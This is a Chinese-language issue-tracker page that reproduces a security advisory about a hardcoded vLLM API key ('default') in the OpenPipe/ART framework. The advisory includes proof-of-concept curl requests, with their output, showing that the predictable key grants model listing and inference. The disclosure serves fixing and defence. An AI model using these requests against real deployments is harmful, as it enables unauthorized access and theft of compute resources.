Hacktoberfest 2026:维护者为十月标记出来的 issue,仍然开放、适合新手。 浏览 Hacktoberfest issue

[Security] Hardcoded API Key in vLLM Server Configuration Allows Authentication Bypass

未关闭
#628 0 条评论 0 个 reaction 已指派 0 人 在 GitHub 查看

维护者通常 3 天内回复

还没有人认领这个 Issue。

评估

难度
3/5
预计耗时
1-2 天
新手友好度
52/100
Issue 类型
缺陷
描述清晰度
描述清楚
活跃度
停滞
技术栈
python
领域
api, security

调研方向

阅读 src/art/dev/openai_server.py 和 get_openai_server_config 函数,重点关注 ServerArgs 的初始化及其对 api_key 的处理。针对本地 vLLM 端点重现文档中记录的请求,然后验证可预测的默认凭据不再授予访问权限,同时有效的已配置身份验证仍然有效。

由索引模型根据 Issue 内容生成。

描述

Advisory Details

Title: Hardcoded API Key in vLLM Server Configuration Allows Authentication Bypass

Description:

Summary

A hardcoded credential vulnerability exists in the ART framework's vLLM server configuration generator. The framework unconditionally initializes the built-in vLLM OpenAI-compatible server with a default API key set to "default". This allows any unauthenticated user with network access to the service to bypass authentication, consume LLM inference resources, and query sensitive model deployment information.

Details

In src/art/dev/openai_server.py, the get_openai_server_config function is responsible for orchestrating the setup of the internal vLLM server. The ServerArgs data structure is instantiated with a hardcoded api_key="default".

Because this API key is statically assigned and passed to the vLLM engine at startup without automatically generating a secure random token or enforcing a required user-defined key, the vLLM server's internal authentication middleware consistently accepts Authorization: Bearer default for all incoming REST API requests.

PoC
  1. Deploy the ART framework and start a local model service (e.g., via the LocalBackend or CLI), which exposes the vLLM HTTP API on a listening port (e.g., 8000).

  2. Step 1 — Confirm auth bypass (list models with hardcoded key):

curl -s http://<target>:8000/v1/models \
     -H "Authorization: Bearer default" | python3 -m json.tool
  1. Step 2 — Demonstrate actual harm (unauthorized inference / GPU resource theft):
curl -s http://<target>:8000/v1/chat/completions \
     -H "Authorization: Bearer default" \
     -H "Content-Type: application/json" \
     -d '{
       "model": "Qwen/Qwen1.5-0.5B",
       "messages": [{"role": "user", "content": "What is the capital of France?"}],
       "max_tokens": 64
     }' | python3 -m json.tool
  1. Step 3 — Negative test (wrong key is correctly rejected, proving auth middleware is active):
curl -i http://<target>:8000/v1/models \
     -H "Authorization: Bearer wrong-key"
Log of Evidence

Step 1 — Auth bypass succeeds (model listing):

{
    "object": "list",
    "data": [
        {
            "id": "Qwen/Qwen1.5-0.5B",
            "object": "model",
            "created": 1774020077,
            "owned_by": "organization",
            "permission": []
        }
    ]
}

Step 2 — Unauthorized inference succeeds (GPU resource theft):

{
    "id": "chatcmpl-583d9a951ae8",
    "object": "chat.completion",
    "created": 1774020077,
    "model": "Qwen/Qwen1.5-0.5B",
    "choices": [
        {
            "index": 0,
            "message": {
                "role": "assistant",
                "content": "The capital of France is Paris..."
            },
            "finish_reason": "stop"
        }
    ],
    "usage": {
        "prompt_tokens": 30,
        "completion_tokens": 36,
        "total_tokens": 66
    }
}

The model processed the attacker's prompt and returned a valid inference result, proving the attacker can consume GPU compute resources at will without any legitimate credentials.

Step 3 — Wrong key is rejected (auth middleware is active):

HTTP/1.1 401 Unauthorized
content-type: application/json

{"error":{"message":"Unauthorized","type":"invalid_api_key"}}

This confirms the authentication mechanism is present and functioning — the vulnerability is specifically that the API key is hardcoded to a predictable value ("default"), not that authentication is missing.

Impact

This is an Improper Authentication / Use of Hardcoded Credentials vulnerability. Any attacker able to route traffic to the listening port can entirely bypass the API authentication layer to make arbitrary LLM inference requests. This leads to severe resource exhaustion, financial quota depletion, Denial of Service (DoS) by maxing out GPU computation capabilities, and potential unauthorized reconnaissance of hosted models.

Affected products
  • Ecosystem: python
  • Package name: art
  • Affected versions: <= latest
  • Patched versions:
Severity
  • Severity: High
  • Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
Weaknesses
  • CWE: CWE-798: Use of Hard-coded Credentials
Occurrences
Permalink Description
https://github.com/OpenPipe/ART/blob/main/src/art/dev/openai_server.py#L30 The ServerArgs initialization forcefully sets api_key="default", causing the deployed vLLM instance to blindly accept this default key for all privileged API interactions.
主要语言
Python
星标
10.8k
派生
989
平均合并
11 小时 38 分钟
30 天内合并 PR
104

环境准备

从这里开始

  1. 先读完整个 Issue,再读项目的贡献指南。
  2. 在 Issue 下留言说明你要接手 —— 这能避免两个人做同样的事。
  3. Fork 仓库,在一个分支上完成修改。
  4. 提交 Pull Request,并在描述里引用这个 Issue 编号。

OpenPipe/ART 的其他 Issue

查看 OpenPipe/ART 的全部 Issue

相似的 Issue

更多 Python Issue

把新 issue 发到你的邮箱

精选适合新手参与的 GitHub issue 摘要。